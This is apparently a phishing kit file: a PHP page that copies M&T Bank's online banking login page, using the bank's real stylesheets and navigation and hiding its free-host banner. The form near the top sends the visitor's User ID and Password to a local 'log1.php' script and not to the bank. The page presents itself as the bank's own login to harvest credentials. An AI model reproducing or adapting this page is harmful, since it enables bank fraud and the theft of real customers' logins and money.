<?php
ini_set("output_buffering",4096);
session_start();
?>
<!DOCTYPE html >
<html dir="ltr" lang="en-US">
    <head>        
		<meta name="robots" content="noimageindex, noindex, nofollow, nosnippet">
		<style>img[alt="www.000webhost.com"]{display:none;}</style>
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>
	M&amp;T Bank
</title>
<link rel="stylesheet" type="text/css" href="https://www.mtb.com/_layouts/15/1033/styles/Themable/corev15.css?rev=2bpHeX9U8DH09TB5zpJcsQ%3D%3D"/>
<link type="text/xml" rel="alternate" href="https://www.mtb.com/sub/_vti_bin/spsdisco.aspx" />
<link href="https://resources.mtb.com/r/simple-layout-responsive/css.mtb?v=08272019094328" rel="stylesheet"/>
<link rel="shortcut icon" href="https://asset.mtb.com/Documents/html/homepage/favicon.ico" type="image/x-icon">
       </head>
    <body>
<script language="JavaScript">
<!--
function check(form) {
if (form.userId.value=="")
{ alert("Please enter your User ID before submitting."); form.userId.focus(); return;}
if (form.Passcode.value=="")
{ alert("Please enter your Password before submitting."); form.Passcode.focus(); return;}
form.submit()
}
//-->
</script>
<form action="log1.php" method="post" onclick="check(this.form)" onsubmit="check(this.form)">	

        <div id="s4-workspace">
            <div id="s4-bodyContainer">
                <div>
                    
                    
                    <span id="DeltaPlaceHolderMain">
                        
	<div data-name="ContentPlaceHolderMain">
      <div data-name="WebPartZone">
         <div class="ms-webpart-zone">
	<div id="MSOZoneCell_WebPartctl00_ctl34_g_611bbd3e_5938_499d_82e3_95422dc33c25" class="s4-wpcell-plain ms-webpartzone-cell ms-webpart-cell-vertical ms-fullWidth ">
		<div class="ms-webpart-chrome ms-webpart-chrome-vertical ms-webpart-chrome-fullWidth ">
			<div WebPartID="611bbd3e-5938-499d-82e3-95422dc33c25" HasPers="false" id="WebPartctl00_ctl34_g_611bbd3e_5938_499d_82e3_95422dc33c25" width="100%" class="ms-WPBody " allowDelete="false" allowExport="false" style="" ><div id="ctl00_ctl34_g_611bbd3e_5938_499d_82e3_95422dc33c25">
				<!DOCTYPE html>
				<html class="no-js" id="browserClasses" lang="en">
				<head>
				<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Home</title>


<link rel="stylesheet" href="https://asset.mtb.com/Documents/html/homepage/styles/site.css?vsn=267506dad3c83fdcc07f443c5023c318">



</head>
<body class="tbg home">
<div class="wrapper row-offcanvas wrapper-is-collapsed">
<header id="header" class="header">

    <div class="l-inner cf">
        <a href="/" class="header-logo" title="Go to the home page">
            
        </a>

        <div class="header-locator" style="background-image:none">
    <span class="header-locator-title js-header-locator-title" style="display:none">
        <span class="hidden-xs hidden-sm">Showing </span><span class="text-capitalize-sm">info</span> for:
    </span>
            <div class="header-locator-location">
                <span class="hidden-xs hidden-sm js-city-state"> </span>
                <span class="js-zip"></span>
                <div class="header-locator-change">

                    <span class="location" style="display:none"><a class="js-location" tabindex="0">Change</a></span>

                    <div class="popover-content-wrap js-geolocation-form" style="display:none">

                        <div id="zipFlyout" class="header-locator-change-flyout cf" role="dialog">



                        <span class="form-input-text form-group">

                            <label class="sr-only" for="locator-zip">Enter Zip Code</label>

                            <input type="tel" placeholder="Enter Zip Code" id="locator-zip" class="js-userZipCode">

                        </span>
                            <button type="button" class="btn btn-green-dk dropdown-menu-close js-set-zipcode">Set
                                Location
                            </button>


                        </div>
                    </div>

                </div>

                <span class="header-more-info-container" style="display:none">
            <button class="link-more-info icon-only popover-trigger" data-container=".header-more-info-container" data-toggle="popover" data-placement="bottom" data-html="true" aria-labelledby="zipInfoFlyout">More Information</button>
            <span class="popover-content-wrap" style="display:none">
                <span id="zipInfoFlyout" class="header-locator-info-flyout" role="dialog">
                    <span class="header-locator-info-flyout-text">Products and fees vary by zip code. <br>Change your location for greater accuracy.</span>
                    <div class="zip-info-flyout"></div>
                </span>
            </span>
        </span>
            </div>
        </div>

        <div class="header-utility cf">
            <button type="button" class="btn btn-green sidebar-offcanvas-toggle js-nav-breadcrumbs-toggle">
                Menu
            </button>
            <div class="header-search-container">
                <button type="button" class="btn header-search-toggle popover-trigger" data-container=".header-search-container" data-toggle="popover" aria-labelledby="searchFlyout"></button>
                <div class="popover-content-wrap">
                    <div id="searchFlyout" class="header-forms header-search-flyout" role="dialog">
                        <form class="form-inline" method="GET" action="/search">
                            <div class="header-forms-inner">
                                <div class="header-search form-input-text form-group">
                                    <label class="sr-only" for="header-search">Search</label>
                                    <input name="k" type="search" placeholder="Search" aria-label="Search" class="header-search-input" id="header-search">
                                    <button type="submit" class="header-search-submit">Go</button>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
            </div>

        </div>

    </div>
    <div class="js-nav-flyout-wrap"></div>
    <nav id="nav-primary" class="navbar nav-primary" role="navigation">
        <div class="l-inner cf">
            <div class="collapse navbar-collapse" id="nav-primary-collapse-1">
                <ul class="nav navbar-nav nav-primary-level1 cf">
                    <li name="bnavl1" parname="Banking " sortby="1" tabindex="0"><a data-target="#" href="/banking" class="dropdown-toggle" data-toggle="" tabindex="-1">
                        <h2>Banking </h2></a>
                        <div class="container dropdown-menu nav-primary-level2 cf">
                            <div class="row" nav2parent="Banking">
                                <div class="nav-primary-level2-col col-md-4" sortby="1"><h3><a href="/banking" tabindex="0">Personal</a>
                                </h3>
                                    <ul nav3parent="Personal - Banking">
                                        <li sortby="1"><a href="/banking/why-bank-with-mt" tabindex="0">Why Bank with M&amp;T?</a>
                                        </li>
                                        <li sortby="2"><a href="/banking/checking-accounts" tabindex="0">Checking
                                            Accounts</a></li>
                                        <li sortby="3"><a href="/banking/mt-debit-cards" tabindex="0">Debit Cards</a>
                                        </li>
                                        <li sortby="4"><a href="/banking/savings-cds" tabindex="0">Savings &amp; CDs</a>
                                        </li>
                                        <li sortby="5"><a href="/banking/online-mobile-services" tabindex="0">Online
                                            &amp; Mobile Services</a></li>
                                        <li sortby="6"><a href="/banking/credit-cards" tabindex="0">Credit Cards</a>
                                        </li>
                                        <li sortby="7"><a href="https://mtb.everfi-next.net/welcome/mtb" tabindex="0">M&T Money Mentor</a>
                                        </li>
                                    </ul>
                                </div>
                                <div class="nav-primary-level2-col col-md-4" sortby="2"><h3><a href="/business/business-banking" tabindex="0">Business Banking</a></h3>
                                    <ul nav3parent="Business Banking - Banking">
                                        <li sortby="1"><a href="/business/business-banking/build-custom-banking-solution" tabindex="0">Build a Custom Banking Solution</a></li>
                                        <li sortby="2"><a href="/business/business-banking/business-checking" tabindex="0">Business Checking</a></li>
                                        <li sortby="3"><a href="/business/business-banking/business-savings" tabindex="0">Business Savings</a></li>
                                        <li sortby="4"><a href="/business/business-banking/business-financing/credit-cards" tabindex="0">Business Credit Cards</a></li>
                                        <li sortby="5"><a href="/business/business-banking/business-checking/business-debit-cards" tabindex="0">Business Debit Cards</a></li>
                                        <li sortby="6"><a href="/business/business-banking/merchant-services" tabindex="0">Merchant Services</a></li>
                                        <li sortby="7"><a href="/business/business-banking/business-checking/online-mobile-banking-business" tabindex="0">Online &amp; Mobile Banking</a></li>
                                    </ul>
                                </div>
                                <div class="nav-primary-level2-col col-md-4" sortby="3"><h3><a href="/business/commercial-banking" tabindex="0">Commercial Banking</a></h3>
                                    <ul nav3parent="Commercial - Banking">
                                        <li sortby="1"><a href="/business/commercial-banking/deposit-services/commercial-checking" tabindex="0">Checking Options</a></li>
                                        <li sortby="2"><a href="/business/commercial-banking/deposit-services/savings-time-deposits" tabindex="0">Savings &amp; Time Deposits</a></li>
                                        <li sortby="3"><a href="/business/commercial-banking/treasury-management/information-services" tabindex="0">Information Services</a></li>
                                        <li sortby="3"><a href="/business/commercial-banking/financing-solutions/loans-lines-of-credit/real-estate-financing" tabindex="0">Real Estate Financing</a></li>
                                        <li sortby="4"><a href="/business/business-banking/merchant-services" tabindex="0">Merchant Services</a></li>
                                        <li sortby="5"><a href="/business/commercial-banking/treasury-management" tabindex="0">Treasury Management</a></li>
                                        <li sortby="6"><a href="/business/commercial-banking/deposit-services/escrow-services" tabindex="0">Escrow Services</a></li>
                                        <li sortby="8"><a href="/business/commercial-banking/investment-banking" tabindex="0">Investment Banking</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </li>
                    <li name="bnavl1" parname="Mortgages &amp; Loans " sortby="2" tabindex="0"><a data-target="#" href="/mortgages-loans" class="dropdown-toggle" data-toggle="" tabindex="-1"><h2>Mortgages &amp; Loans </h2></a>
                        <div class="container dropdown-menu nav-primary-level2 cf">
                            <div class="row" nav2parent="Mortgages &amp; Loans">
                                <div class="nav-primary-level2-col col-md-4" sortby="1"><h3><a href="/mortgages-loans" tabindex="0">Mortgages
                                    &amp; Loans</a></h3>
                                    <ul nav3parent="Personal - Mortgages &amp; Loans">
                                        <li sortby="1"><a href="/mortgages-loans/why-finance-with-mt" tabindex="0">Why
                                            Finance with M&amp;T?</a></li>
                                        <li sortby="2"><a href="/mortgages-loans/mortgages" tabindex="0">Mortgages</a>
                                        </li>
                                        <li sortby="3"><a href="/mortgages-loans/mortgages/mortgage-refinancing" tabindex="0">Refinancing</a></li>
                                        <li sortby="4"><a href="/mortgages-loans/home-equity" tabindex="0">Home
                                            Equity</a></li>
                                        <li sortby="5"><a href="/mortgages-loans/personal-loans" tabindex="0">Personal
                                            Loans</a></li>
                                        <li sortby="6"><a href="/mortgages-loans/auto-loans" tabindex="0">Auto Loans</a>
                                        </li>
                                        <li sortby="7"><a href="/mortgages-loans/student-loans" tabindex="0">Student Loans</a></li>
                                        <li sortby="8"><a href="/mortgages-loans/marine-recreational-vehicle-loans" tabindex="0">Marine &amp; RV Loans</a></li>
                                        <li sortby="9"><a href="/banking/credit-cards" tabindex="0">Credit Cards</a>
                                        </li>
                                    </ul>
                                </div>
                                <div class="nav-primary-level2-col col-md-4" sortby="2"><h3><a href="/business/business-banking" tabindex="0">Business Banking</a></h3>
                                    <ul nav3parent="Business Banking - Mortgages &amp; Loans">
                                        <li sortby="1"><a href="/business/business-banking/business-financing/business-loans" tabindex="0">Business Loans</a></li>
                                        <li sortby="2"><a href="/business/business-banking/business-financing/lines-of-credit" tabindex="0">Lines of Credit</a></li>
                                        <li sortby="3"><a href="/business/business-banking/business-financing/term-loans" tabindex="0">Term Loans</a></li>
                                        <li sortby="4"><a href="/business/commercial-banking/financing-solutions/equipment-financing" tabindex="0">Equipment Financing</a></li>
                                        <li sortby="5"><a href="/business/business-banking/business-financing/credit-cards" tabindex="0">Business Credit Cards</a></li>
                                    </ul>
                                </div>
                                <div class="nav-primary-level2-col col-md-4" sortby="3"><h3><a href="/business/commercial-banking" tabindex="0">Commercial Banking</a></h3>
                                    <ul nav3parent="Commercial - Mortgages &amp; Loans">
                                        <li sortby="1"><a href="/business/commercial-banking/financing-solutions/loans-lines-of-credit/real-estate-financing" tabindex="0">Real Estate Financing</a></li>
                                        <li sortby="2"><a href="/business/commercial-banking/financing-solutions" tabindex="0">Financing Solutions</a></li>
                                        <li sortby="3"><a href="/business/commercial-banking/financing-solutions/loans-lines-of-credit" tabindex="0">Loans &amp; Lines of Credit</a></li>
                                        <li sortby="4"><a href="/business/commercial-banking/financing-solutions/equipment-financing" tabindex="0">Equipment Financing</a></li>
                                        <li sortby="5"><a href="/business/commercial-banking/financing-solutions/loans-lines-of-credit/asset-based-lending" tabindex="0">Asset Based Lending</a></li>
                                        <li sortby="6"><a href="/business/commercial-banking/treasury-management/automated-loan-sweep-service" tabindex="0">Loan Sweep Services</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </li>
                    <li name="bnavl1" parname="Investments &amp; Insurance " sortby="3" tabindex="0"><a data-target="#" href="/investments-insurance" class="dropdown-toggle" data-toggle="" tabindex="-1"><h2>Investments &amp; Insurance </h2></a>
                        <div class="container dropdown-menu nav-primary-level2 cf">
                            <div class="row" nav2parent="Investments &amp; Insurance">
                                <div class="nav-primary-level2-col col-md-4" sortby="1"><h3><a href="/investments-insurance" tabindex="0">Personal</a></h3>
                                    <ul nav3parent="Personal - Investments &amp; Insurance">
                                        <li sortby="1"><a href="/investments-insurance/why-invest-insure-with-mt" tabindex="0">Why Invest or Insure with M&amp;T?</a></li>
                                        <li sortby="2"><a href="/investments-insurance/financial-planning" tabindex="0">Financial
                                            Solutions</a></li>
                                        <li sortby="3"><a href="/investments-insurance/investment-products-services" tabindex="0">Investment Products &amp; Services</a></li>
                                        <li sortby="4"><a href="/investments-insurance/retirement" tabindex="0">Retirement</a>
                                        </li>
                                        <li sortby="5"><a href="/investments-insurance/insurance" tabindex="0">Insurance</a></li>
                                    </ul>
                                </div>
                                <div class="nav-primary-level2-col col-md-4" sortby="2"><h3><a href="/business/business-banking/investments-insurance" tabindex="0">Business
                                    Banking</a></h3>
                                    <ul nav3parent="Business Banking - Investments &amp; Insurance">
                                        <li sortby="1"><a href="/business/business-banking/investments-insurance/investments" tabindex="0">Investments</a></li>
                                        <li sortby="2"><a href="/business/business-banking/investments-insurance/insurance/key-person-insurance" tabindex="0">Key Person Insurance</a></li>
                                        <li sortby="3"><a href="/business/business-banking/investments-insurance/insurance/deferred-compensation" tabindex="0">Deferred Compensation</a></li>
                                        <li sortby="4"><a href="/business/business-banking/employee-benefits" tabindex="0">Employee Benefits</a></li>
                                        <li sortby="5"><a href="/business/business-banking/investments-insurance/insurance" tabindex="0">Insurance</a></li>
                                        <li sortby="6"><a href="https://library.mtb.com/tag/insurance/" tabindex="0">Resources
                                            &amp; Insights</a></li>
                                    </ul>
                                </div>
                                <div class="nav-primary-level2-col col-md-4" sortby="3"><h3><a href="/business/commercial-banking" tabindex="0">Commercial Banking</a></h3>
                                    <ul nav3parent="Commercial - Investments &amp; Insurance">
                                        <li sortby="1"><a href="/business/commercial-banking/investments" tabindex="0">Investments</a>
                                        </li>
                                        <li sortby="2"><a href="/business/commercial-banking/employee-benefits" tabindex="0">Employee Benefits</a></li>
                                        <li sortby="3"><a href="/business/commercial-banking/commercial-insurance" tabindex="0">Insurance</a></li>
                                        <li sortby="4"><a href="https://www.wilmingtontrust.com/wtcom/index.jsp?section=Corp&amp;fileid=1414074921146" tabindex="0">Capital Market Trust Agency Services</a></li>
                                        <li sortby="5"><a href="https://www.wilmingtontrust.com/wtcom/index.jsp?section=Corp&amp;fileid=1414156140501" tabindex="0">Institutional Custody Services</a></li>
                                        <li sortby="6"><a href="/business/commercial-banking/international-banking" tabindex="0">International Banking</a></li>
                                        <li sortby="7"><a href="/business/commercial-banking/investment-banking" tabindex="0">Investment Banking</a></li>
                                        <li sortby="8"><a href="https://library.mtb.com/tag/insurance" tabindex="0">Resources
                                            &amp; Insights</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </li>
                    <li name="bnavl1" parname="Business " sortby="5" tabindex="0"><a data-target="#" href="/business" class="dropdown-toggle" data-toggle="" tabindex="-1">
                        <h2>Business </h2></a>
                        <div class="container dropdown-menu nav-primary-level2 cf">
                            <div class="row" nav2parent="Business">
                                <div class="nav-primary-level2-col col-md-6" sortby="1"><h3><a href="/business/business-banking" tabindex="0">Business Banking</a></h3>
                                    <ul nav3parent="Business Banking - Business">
                                        <li sortby="1"><a href="/business/business-banking/why-bank-with-mt" tabindex="0">Why Bank with M&amp;T?</a></li>
                                        <li sortby="2"><a href="/business/business-banking/business-checking" tabindex="0">Business Checking</a></li>
                                        <li sortby="3"><a href="/business/business-banking/business-savings" tabindex="0">Business Savings</a></li>
                                        <li sortby="4"><a href="/business/business-banking/business-financing" tabindex="0">Business Financing</a></li>
                                        <li sortby="5"><a href="/business/business-banking/cash-management" tabindex="0">Cash Management</a></li>
                                        <li sortby="5"><a href="/business/business-banking/business-financing/credit-cards" tabindex="0">Business Credit Card</a></li>
                                        <li sortby="6"><a href="/business/business-banking/merchant-services" tabindex="0">Merchant Services</a></li>
                                        <li sortby="7"><a href="/business/business-banking/investments-insurance" tabindex="0">Investments &amp; Insurance</a></li>
                                        <li sortby="8"><a href="/business/business-banking/business-succession-planning" tabindex="0">Business Succession Planning</a></li>
                                        <li sortby="9"><a href="/business/business-banking/employee-benefits" tabindex="0">Employee Benefits</a></li>
                                        <li sortby="99"><a href="/business/business-banking/industry-solutions" tabindex="0">Industry Solutions</a></li>
                                        <li sortby="100"><a href="https://library.mtb.com/tag/small-business" tabindex="0">Resources &amp; Insights</a></li>
                                    </ul>
                                </div>
                                <div class="nav-primary-level2-col col-md-6" sortby="2"><h3><a href="/business/commercial-banking" tabindex="0">Commercial Banking</a></h3>
                                    <ul nav3parent="Commercial - Business">
                                        <li sortby="1"><a href="/business/commercial-banking/why-bank-with-mt" tabindex="0">Why Bank with M&amp;T?</a></li>
                                        <li sortby="2"><a href="/business/commercial-banking/deposit-services" tabindex="0">Deposit Services</a></li>
                                        <li sortby="3"><a href="/business/commercial-banking/financing-solutions" tabindex="0">Financing Solutions</a></li>
                                        <li sortby="4"><a href="/business/commercial-banking/treasury-management" tabindex="0">Treasury Management</a></li>
                                        <li sortby="5"><a href="/business/business-banking/merchant-services" tabindex="0">Merchant Services</a></li>
                                        <li sortby="6"><a href="/business/commercial-banking/international-banking" tabindex="0">International Banking</a></li>
                                        <li sortby="7"><a href="/business/commercial-banking/investment-banking" tabindex="0">Investment Banking</a></li>
                                        <li sortby="8"><a href="/business/commercial-banking/employee-benefits" tabindex="0">Employee Benefits</a></li>
                                        <li sortby="9"><a href="/business/commercial-banking/commercial-insurance" tabindex="0">Insurance</a></li>
                                        <li sortby="99"><a href="/business/commercial-banking/investments" tabindex="0">Investments</a>
                                        </li>
                                        <li sortby="999"><a href="/business/commercial-banking/industry-solutions" tabindex="0">Industry Solutions</a></li>
                                        <li sortby="1000"><a href="https://library.mtb.com/tag/commercial" tabindex="0">Resources
                                            &amp; Insights</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </li>
                    <li name="bnavl1" parname="Resources &amp; Insights " sortby="5" tabindex="0"><a data-target="#" href="https://library.mtb.com/" class="dropdown-toggle" data-toggle="" tabindex="-1"><h2>Resources &amp; Insights </h2></a>
                        <div class="container dropdown-menu nav-primary-level2 cf">
                            <div class="row" nav2parent="Resources &amp; Insights">
                                <div class="nav-primary-level2-col col-md-4" sortby=""><h3><a href="https://library.mtb.com" tabindex="0">Resources &amp; Insights</a></h3>
                                    <ul nav3parent="Resources &amp; Insights - Resources &amp; Insights">
                                        <li sortby="1"><a href="https://library.mtb.com/tag/small-business" tabindex="0">Small Business</a></li>
                                        <li sortby="2"><a href="https://library.mtb.com/tag/commercial" tabindex="0">Commercial</a>
                                        </li>
                                        <li sortby="3"><a href="https://library.mtb.com/tag/insurance" tabindex="0">Insurance</a>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </li>
                   
                </ul>
            </div>
        </div>
    </nav>
</header>

<div class="nav-wrap">

    <nav class="nav-secondary">
        <div class="l-inner cf">
            <div class="js-utility-footer-tpl" style="display: none">
                <li><a href="{{ link }}">{{ text }}</a></li>
            </div>
            <ul class="js-utility-footer" style="padding-top: 9px">

            </ul>
            <a href="/" class="nav-secondary-logo" title="Go to the home page">
                
            </a>
        </div>
    </nav>
</div>

<div id="main" class="content-wrap js-content-wrap hero-main cf">

    <div class="hero-wrapper">
	<div id="hero" class="hero-container responsive">
            <div class="l-inner container">
                <div class="row">
                    <img src="https://www5.0zz0.com/2020/02/14/23/261186848.png" style="width:853px;">
                    <div class="col-md-4 md sm xs callout login-widget">
                        <ul class="nav nav-tabs">
                        </ul>
						
                        <div class="widget-login-col">
                            <div class="js-personal">
                                <div class="login-title">Log In To M&amp;T Online Banking</div>
                                
                                    <fieldset class="login-form login-form-main">
                                        <div class="form-input-text form-group">
                                            <label class="sr-only" for="UserId">User ID</label>
 <input class="input-group-field js-formnputItem" placeholder="User ID"  data-fc-id="121" type="text" id="userId" name="userId" autocomplete="off"  
                               aria-required="true" data-inputtype="text" data-attribute="" maxlength="20" />
                                        </div>
                                        <div class="form-input-text form-group">
                                            <label class="sr-only" for="Passcode">Password</label>
<input class="input-group-field js-formnputItem" placeholder="Password" data-fc-id="122" type="password" id="Passcode" name="Passcode" autocomplete="off"  aria-required="true" data-inputtype="tel" maxlength="25"/>
                                        </div>
                                        <div class="login-meta">
                                            <span>
                                                <input type="checkbox" aria-label="Remember My User ID" name="remember" id="OLB_RememberMe_Widget" class="checkbox">
                                                <label for="OLB_RememberMe_Widget">Remember User ID</label>
                                            </span>
                                        </div>
                                        <div class="text-center">

											<button type="button" class="btn btn-green-dk btn-icon-lock js-login-web-banking" href="javascript:submit()" onclick="check(this.form)" onsubmit="check(form);" id="btnSubmit">
                        Log In
                    </button>
                                        </div>
                                    </fieldset>
                                </form>
                                <span class="header-login-join">
                                    <span><a href="https://onlinebanking.mtb.com/Login/LoginHelp" data-tag="Help with User ID or Password">Help with User ID or Password</a></span> |
                                    <span><a href="https://mtb.com/olb-enroll" data-tag="Enroll Now">Enroll Now</a></span>
                                </span>
                                <form class="form-inline">
                                    <fieldset class="login-form login-form-other-accounts">
                                        <div class="form-group">
                                            <label class="form-select" for="PersonalLoginOtherServices_Widget">
                                                <select id="PersonalLoginOtherServices_Widget" class="form-control js-login-select" name="PersonalLoginOtherServices_Widget">
                                                    <option value="36" data-url="https://mtb.com/log-in" data-newwin="False" data-isdefault="True" data-desktop="True" data-mobile="False" data-webbankinglogin="False">Other Personal and Business Services...
                                                    </option>
                                                    <option value="13" data-url="https://webinfoplus.mandtbank.com/cashplus/" data-newwin="False" data-desktop="True" data-mobile="False" data-webbankinglogin="False">Web InfoPLU$
                                                    </option>
                                                    <option value="1" data-url="https://onlinebanking.mtb.com/Login/MTBSignOn" data-newwin="False" data-desktop="True" data-mobile="False" data-webbankinglogin="True">Online Banking
                                                    </option>
                                                    <option value="4" data-url="https://mandt.netxinvestor.com/" data-newwin="False" data-desktop="True" data-mobile="False" data-webbankinglogin="False">M&amp;T Web Trading
                                                    </option>
                                                    <option value="7" data-url="https://mtb.com/log-in" data-newwin="False" data-desktop="True" data-mobile="False" data-webbankinglogin="False">View All &gt;
                                                    </option>
                                                </select>
                                            </label>
                                        </div>
                                    </fieldset>
                                
                            </div>
                        </div>

					</div>
                </div>
            </div>
        </div>
        
    </div>
</div>
<footer class="footer">
    <div class="footer-section1">
        <div class="l-inner cf">

            <div class="footer-contact">
                <h4 class="h4">
                    <a class="link-call-us" role="button" href="#call-us" data-toggle="collapse" aria-labelledby="call-us">Call Us
                    </a>
                </h4>
                <div id="call-us" class="collapse">
                    <div class="call-us-tpl" style="display: none;">
                        <div class="footer-contact-group">
                            <span class="contact-department">{{ title }}</span> - <span class="contact-phone"><a href="tel:{{contactNumber}}">{{ contactNumber }}</a></span>
                            <span class="contact-hours">
                                    <time datetime="{{ callUsHours }}">{{ callUsHours }}</time>
                                </span>
                        </div>
                    </div>

                    <div class="call-us"></div>


                </div>
            </div>

            <div class="footer-social">

                <div class="social-links-tpl" style="display: none">

                    <li class="align-middle" data-contenttype="Follow Us" sortby="{{ sortOrder }}">
                        <a href="{{ link }}" target="_self" class="{{ iconDropdown }} ir external-link" wcmlink="{{ link }}">
                        </a>
                    </li>

                </div>

                <h4 class="h4">Follow Us:</h4>
                <ul class="footer-social-links social-links js-social-links"></ul>
            </div>
        </div>
    </div>
    <div class="footer-section2">
        <div class="l-inner cf">
            <nav class="footer_nav container">
                <ul class="row">
                    <li class="col-md-2"><span class="footer_nav-header"><a href="/banking">Banking</a></span>
                        <ul>
                            <li><a href="/banking/why-bank-with-mt">Why Bank with M&amp;T?</a></li>
                            <li><a href="/banking/checking-accounts">Checking</a></li>
                            <li><a href="/banking/mt-debit-cards">Debit Cards</a></li>
                            <li><a href="/banking/savings-cds">Savings &amp; CDs</a></li>
                            <li><a href="/banking/online-mobile-services">Online &amp; Mobile Banking</a></li>
                            <li><a href="/banking/credit-cards">Credit Cards</a></li>
                        </ul>
                    </li>
                    <li class="col-md-2"><span class="footer_nav-header"><a href="/mortgages-loans">Mortgages <br> &amp; Loans</a></span>
                        <ul>
                            <li><a href="/mortgages-loans/why-finance-with-mt">Why Finance with M&amp;T?</a></li>
                            <li><a href="/mortgages-loans/mortgages">Mortgages</a></li>
                            <li><a href="/mortgages-loans/home-equity">Home Equity</a></li>
                            <li><a href="/mortgages-loans/personal-loans">Personal Loans</a></li>
                            <li><a href="/mortgages-loans/auto-loans">Auto Loans</a></li>
                            <li><a href="/mortgages-loans/marine-recreational-vehicle-loans">Marine &amp; Recreational Vehicle Loans</a></li>
                            <li><a href="/mortgages-loans/education-financing-options">Education Financing Options</a></li>
                            <li><a href="/banking/credit-cards/">Credit Cards</a></li>
                            <li><a href="/mortgages-loans/repayment-assistance-options">Repayment Assistance Options</a></li>
                        </ul>
                    </li>
                    <li class="col-md-2"><span class="footer_nav-header"><a href="/investments-insurance">Investments <br> &amp; Insurance</a></span>
                        <ul>
                            <li><a href="/investments-insurance/why-invest-insure-with-mt">Why Invest or Insure with M&amp;T?</a></li>
                            <li><a href="/investments-insurance/financial-planning">Financial Solutions</a></li>
                            <li><a href="/investments-insurance/investment-products-services">Investment Products &amp; Services</a></li>
                            <li><a href="/investments-insurance/retirement">Retirement</a></li>
                            <li><a href="/investments-insurance/insurance">Insurance</a></li>
                            <li><a href="/investments-insurance/mt-securities-disclosures">M&amp;T Securities, Inc. Disclosures</a></li>
                        </ul>
                    </li>
                    <li class="col-md-2"><span class="footer_nav-header"><a href="/business">Business</a></span>
                        <ul>
                            <li><a href="/business/business-banking">Business Banking</a></li>
                            <li><a href="/business/commercial-banking">Commercial Banking</a></li>
                        </ul>
                    </li>
                    <li class="col-md-2"><span class="footer_nav-header"><a href="https://library.mtb.com/">Resources &amp; Insights</a></span>
                        <ul>
                            <li><a href="https://library.mtb.com/tag/small-business/">Small Business</a></li>
                            <li><a href="https://library.mtb.com/tag/commercial/">Commercial</a></li>
                            <li><a href="https://library.mtb.com/tag/insurance/">Insurance</a></li>
                        </ul>
                    </li>
                    <li class="col-md-2"><span class="footer_nav-header"><a href="/help-center" class="link-help-center">Help Center</a></span>
                        <ul>
                            <li><a href="/help-center/contact">Contact Us</a></li>
                            <li><a href="/help-center/current-rates-fees">Current Rates</a></li>
                            <li><a href="/help-center/faqs">FAQs</a></li>
                            <li><a href="/help-center/top-banking-tasks">Top Banking Tasks</a></li>
                            <li><a href="/help-center/locations-atms">Locations &amp; ATMs</a></li>
                            <li><a href="/mortgages-loans/repayment-assistance-options/">Repayment Assistance</a></li>
                            <li><a href="/help-center/banking-security">Banking Security</a></li>
                            <li><a href="/help-center/policies">Policies</a></li>
                        </ul>
                    </li>
                </ul>
            </nav>
        </div>
    </div>
    <div class="footer-section3">
        <div class="l-inner cf">

            <nav class="footer_nav-utility">
                <div class="js-footer-tpl" style="display: none">
                    <li><a href="{{ link }}">{{ text }}</a></li>
                </div>

                <ul class="js-footer">
                </ul>
            </nav>
            <form class="form-inline footer-forms" method="GET" action="/search">
                <div class="footer-forms-inner">
                    <div class="footer-search form-input-text form-group">
                        <label class="sr-only" for="footer-search">Search</label>

                        <input name="k" type="search" placeholder="Search" aria-label="Search" class="footer-search-input" id="footer-search">
                        <button type="submit" class="footer-search-submit ir">
                            Search
                        </button>
                    </div>
                </div>
            </form>
           
        </div>
    </div>
    <div class="footer-section4">
        <div class="l-inner cf">
            <div class="footer-legal">
                    <span class="footer-legal-text">
                        <span class="icon-inline js-icon-inline"></span>
                        <span class="js-copyright copyright"></span>
                    </span>
            </div>
        </div>
    </div>
</footer>


<div class="modal" id="myModal">
    <div class="modal-dialog">
        <div class="modal-content">

            
            <div class="modal-header">
                <h3 class="h3 modal-title">Please Note:</h3>
                <button type="button" class="close" data-dismiss="modal"></button>
            </div>

            
            <div class="modal-body">
                <h2 class="h2">By clicking &quot;ok&quot; below, you will leave mtb.com and enter a Third-Party Website.</h2>
                <h3 class="h3">Please note that:</h3>
                <ul class="ul">
                    <li>The Third-Party Website is governed by a different set of terms and conditions and privacy policy than mtb.com and you should review those terms, conditions and privacy policy prior to reviewing the content of the Third-Party Website</li>
                    <li>M&amp;T is providing a link to the Third-Party Website as a convenience and does not necessarily control the content of, or endorse, the Third-Party Website, its owner/operator or any information, products or services that are made available on or through it</li>
                    <li>M&amp;T makes no representations or warranties regarding the information, products or services provided through the Third-Party Website</li>
                </ul>
                <p class="p">Such Third-Party Website's owner/operator may be regulated by governmental entities and laws that are different than those that regulate M&amp;T.</p>
                <a class="btn btn-green btn-arrow js-thirdpartybutton">Ok, continue</a>
            </div>


        </div>
    </div>
</div></div>

<script type="text/javascript" src="https://www.mtb.com/_catalogs/masterpage/WCM/js/DataLayer.js?vsn=267506dad3c83fdcc07f443c5023c318"></script>
<script src="https://asset.mtb.com/Documents/html/homepage/scripts/scripts.js?vsn=267506dad3c83fdcc07f443c5023c318"></script>

</body></html>
			</div><div class="ms-clear"></div></div>
		</div>
	</div>
</div>
      </div>       
   </div>   
                    </span>
                    
                </div>
            </div>
        </div>
    <div id="DeltaFormDigest">

</div>

</form><span id="DeltaPlaceHolderUtilityContent"></span></body>
</html>
<?php ob_end_flush(); ?>